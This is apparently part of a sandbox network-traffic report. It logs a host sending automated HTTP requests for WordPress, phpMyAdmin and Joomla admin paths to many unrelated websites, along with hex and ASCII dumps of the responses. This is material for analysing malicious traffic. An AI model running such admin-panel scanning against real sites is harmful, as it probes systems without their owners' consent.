Feb 21, 2024 00:26:09.656034946 CET	1286	IN	Data Raw: 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 73 74 73 27 3e 54 68 69 73 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 20 69 73 20 61 62 6f 75 74 20 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 46 43 4b 65 64 69 74 6f 72 20 2d 20 55 70 6c 6f 61 64 65 72 73 20 54 65 Data Ascii: - Uploaders Tests'>This contact form is about /components/FCKeditor - Uploaders Tests/ </a><br><a href='index.php?option=phpmyadmin'>This contact form is about /components/phpmyadmin/ </a><br><a href='index.php?option=phpmyadmin2'>This conta
Feb 21, 2024 00:26:09.656049967 CET	1082	IN	Data Raw: 75 69 72 72 65 6c 4d 61 69 6c 20 76 65 72 73 69 6f 6e 20 31 2e 34 2e 34 26 71 75 6f 74 3b 20 69 6e 75 72 6c 3a 73 72 63 20 65 78 74 3a 70 68 70 29 3c 2f 61 3e 20 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 64 65 6d 6f 2f 3f 47 48 48 Data Ascii: uirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - WebUtil 2.7">GHDB Signature #1013 ("SquirrelMail version 1.4.4" inurl:src ext:php)</a> <br><br><a href="/demo/?GHH v1.1 - .mdb/admin.mdb">GHDB

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.6	56806	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.472675085 CET	175	OUT	GET /wp-login.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.631588936 CET	170	IN	HTTP/1.0 403 Forbidden cache-control: no-cache content-type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.6	56807	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.477407932 CET	175	OUT	GET /wp-login.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.636724949 CET	170	IN	HTTP/1.0 403 Forbidden cache-control: no-cache content-type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.6	56816	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.479816914 CET	183	OUT	GET /wp-login.php HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.643385887 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.6	56805	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.496315956 CET	175	OUT	GET /wp-login.php HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.679425955 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:09 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 39 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d Data Ascii: 592<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]
Feb 21, 2024 00:26:09.679440022 CET	487	IN	Data Raw: 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 Data Ascii: +!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded"
Feb 21, 2024 00:26:09.679451942 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.6	56815	217.26.61.200	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.496870041 CET	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: eskimo.ch Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.697530031 CET	431	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:09 GMT Server: Apache Location: https://eskimo.ch/phpmyadmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 73 6b 69 6d 6f 2e 63 68 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://eskimo.ch/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
150	192.168.2.6	56908	185.107.56.198	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.575508118 CET	172	OUT	GET /wp-login.php HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.149188042 CET	925	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 483 content-type: text/html; charset=utf-8 date: Tue, 20 Feb 2024 23:26:09 GMT server: nginx set-cookie: sid=6daf00e0-d047-11ee-9836-b2efaabf9590; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:17 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 61 74 74 2e 63 6f 6d 2e 70 68 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 77 4f 44 51 33 4f 44 63 32 4f 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 35 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 58 46 79 59 6d 78 77 63 48 59 31 62 44 68 31 64 6d 77 30 4f 44 51 7a 63 32 67 30 62 7a 59 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 44 67 30 4e 7a 45 31 4e 6a 6b 73 49 6e 52 7a 49 6a 6f 78 4e 7a 41 34 4e 44 63 78 4e 54 59 35 4e 6a 55 79 4d 54 55 33 66 51 2e 69 43 30 38 35 38 32 55 6b 36 74 55 33 78 32 68 35 6e 55 70 50 52 4d 79 50 4c 68 38 78 4e 76 6f 47 4b 56 4d 4a 77 79 58 64 36 30 26 73 69 64 3d 36 64 61 66 30 30 65 30 2d 64 30 34 37 2d 31 31 65 65 2d 39 38 33 36 2d 62 32 65 66 61 61 62 66 39 35 39 30 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://att.com.ph/wp-login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcwODQ3ODc2OSwiaWF0IjoxNzA4NDcxNTY5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydXFyYmxwcHY1bDh1dmw0ODQzc2g0bzYiLCJuYmYiOjE3MDg0NzE1NjksInRzIjoxNzA4NDcxNTY5NjUyMTU3fQ.iC08582Uk6tU3x2h5nUpPRMyPLh8xNvoGKVMJwyXd60&sid=6daf00e0-d047-11ee-9836-b2efaabf9590');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
151	192.168.2.6	56911	85.214.145.11	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.607542992 CET	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.793052912 CET	394	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://braekling.de/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
152	192.168.2.6	56976	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.636081934 CET	266	OUT	GET /administrator/index.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip Cookie: __tad=1708471569.6011695 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://hotmail.fr.au/administrator/
Feb 21, 2024 00:26:09.807730913 CET	336	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:09 GMT server: Apache vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
153	192.168.2.6	56980	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.648216009 CET	266	OUT	GET /administrator/index.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip Cookie: __tad=1708471569.6086288 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://hotmail.fr.au/administrator/
Feb 21, 2024 00:26:09.845211983 CET	336	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:09 GMT server: Apache vary: Accept-Encoding content-encoding: gzip content-length: 137 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 25 8e 41 12 c2 30 0c 03 cf f8 15 26 9c 43 78 80 9b 03 3f 71 db 94 16 02 e9 04 c3 d0 df e3 c6 3a 49 9e d1 5a 34 cb 33 47 00 9a 13 8f 11 48 16 c9 29 4e f5 cc 1f 0a 16 80 de 43 5d 56 41 d9 d6 d4 39 49 3f 09 77 fe b2 5d 9d 96 81 82 05 f3 86 52 d7 97 71 c3 fe 36 94 5c 6a e7 4e 53 93 c3 9d a0 f1 d2 a4 fd 03 1d bd c7 6b e6 d7 03 d1 7b 7d 18 f6 66 6c 2c 9b 07 7f 28 5c 82 ab a8 00 00 00 Data Ascii: %A0&Cx?q:IZ43GH)NC]VA9I?w]Rq6\jNSk{}fl,(\

Session ID	Source IP	Source Port	Destination IP	Destination Port
154	192.168.2.6	57078	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:09.669852018 CET	176	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: touktoukcie.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:09.792957067 CET	1286	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:09 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive x-wix-request-id: 1708471569.7131478444430122158 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLseIu4dGXwqDk+m1otFKtK/V0TBmJ+uLPQ4OZPC1VSMH,2d58ifebGbosy5xc+FRalqKRhpAPAcicqg9spYbaveOVP0+E0FVY69Zfx0yFLg5YZkMPebZiQLt/0/GYZszyrA==,2UNV7KOq4oGjA5+PKsX47PmOi36p/Q7Ico3sut0FtX4fbJaKSXYQ/lskq2jK6SGP,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,alGcl2prlCF8HwMfrZ9rYKH+o92Cjgvs4rLz3S3oAKE=,/j+AjfLiOiE0Vc9NsP8sK7gAAzzliq9iePftiHVq5jlJpdGUXXdihYUPcFwLcUQYLPdrIc1H06/OFwdhz0Sadw== Vary: Accept-Encoding X-Content-Type-Options: nosniff Content-Encoding: gzip Transfer-Encoding: chunked Data Raw: 34 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 dd 6f db 36 10 7f cf 5f c1 e8 45 2d 10 8a 96 93 2c 4e 26 05 e8 b2 0c cb cb 50 6c 28 b0 a1 28 0a 5a 3a 5b 4c 28 52 25 a9 d8 46 d7 ff bd 77 92 ec 39 71 b0 c6 89 1f 6c f3 c8 fb f8 dd 37 63 d9 21 e7 8c 71 7e 79 70 90 1d 96 b6 08 ab 06 58 15 6a 7d 89 